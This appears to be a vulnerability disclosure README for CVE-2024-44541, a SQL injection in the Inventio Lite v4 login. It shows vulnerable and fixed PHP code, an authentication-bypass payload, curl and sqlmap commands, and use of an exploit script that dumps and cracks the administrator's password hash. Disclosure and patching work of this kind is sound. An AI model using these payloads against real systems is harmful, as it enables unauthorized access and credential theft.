Skip to content

CVE-2024-44541: SQL Injection Vulnerability in Inventio Lite v4

GitHub: https://github.com/pointedsec/CVE-2024-44541


Description

Inventio Lite v4 is vulnerable to SQL Injection (SQLi) in the /action=processlogin endpoint. This vulnerability allows attackers to inject arbitrary SQL queries via the username parameter in POST requests, potentially leading to unauthorized access and data extraction.

Vulnerable Code

The vulnerable code is as follows:

if(!isset($_SESSION["user_id"])) {
$user = $_POST['username'];
$pass = sha1(md5($_POST['password']));

$base = new Database();
$con = $base->connect();
$sql = "select * from user where (email= \"".$user."\" or username= \"".$user."\") and password= \"".$pass."\" and is_active=1";
$query = $con->query($sql);
$found = false;
$userid = null;
while($r = $query->fetch_array()){
$found = true;
$userid = $r['id'];
}
}

Screenshot of the Vulnerable Code: 

Fixed Code

The issue is fixed by using prepared statements:

if(!isset($_SESSION["user_id"])) {
$user = $_POST['username'];
$pass = sha1(md5($_POST['password']));

$base = new Database();
$con = $base->connect();

// Prepare the query
$stmt = $con->prepare("
SELECT * FROM user
WHERE (email = ? OR username = ?)
AND password = ?
AND is_active = 1
");

// Bind parameters
$stmt->bind_param("sss", $user, $user, $pass);

// Execute query
$stmt->execute();

// Get result
$result = $stmt->get_result();
$found = false;
$userid = null;

while($r = $result->fetch_assoc()){
$found = true;
$userid = $r['id'];
}

// Close statement
$stmt->close();
}

Exploitation

Auth Bypass Payload

To exploit this vulnerability, use the following payload:

user -> ") or 1=1-- - 
pass -> blablalba

Example of the attack using curl:

$ curl -X POST http://192.168.1.51/inventio-lite/?action=processlogin -d 'username=%22%29%20or%201%3D1--%20-&password=blablabla' -v && echo ""

SQLMap Example

$ sqlmap -u http://192.168.1.51/inventio-lite/?action=processlogin --data="username=*&password=*" --level 5 --risk 3 --dbms=mysql --dbs --prefix='")' --batch --dbs

Exploit Script

To automate the exploitation and extraction of the administrator's username and password hash, you can use the provided Python script, sqli.py.

You can clone this repository

git clone https://github.com/pointedsec/CVE-2024-44541

Then install the requirements with pip

pip install -r requirements.txt

Modify the following variables in the script as needed:

And execute the script, this will dump the Administrator username and hash, then tries to crack the hash with the SHA1(MD5(password)) format.

Example output:

$ python3 sqli.py
[*] Checking if target is vulnerable
[+] Target Vulnerable!
[*] Dumping Administrator username...
[◤] Extracting Username: -> POINTEDSEC@GMAIL.COM
[/] Extracting Admin Password Hash: Final Admin Hash: 90b9aa7e25f80cf4f64e990b78a9fc5ebd6cecad
[+] Password Decrypted! -> POINTEDSEC@GMAIL.COM:admin
[*] Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations

Impact

Confidentiality: Attackers can dump the entire database, exposing sensitive data such as user credentials and personal information.

Integrity: Attackers can bypass authentication and gain administrative access, allowing them to modify or delete data.

References

Credits

This vulnerability report was identified by Andrés Del Cerro. For further details, please contact me in pointedpentesting@gmail.com

Latest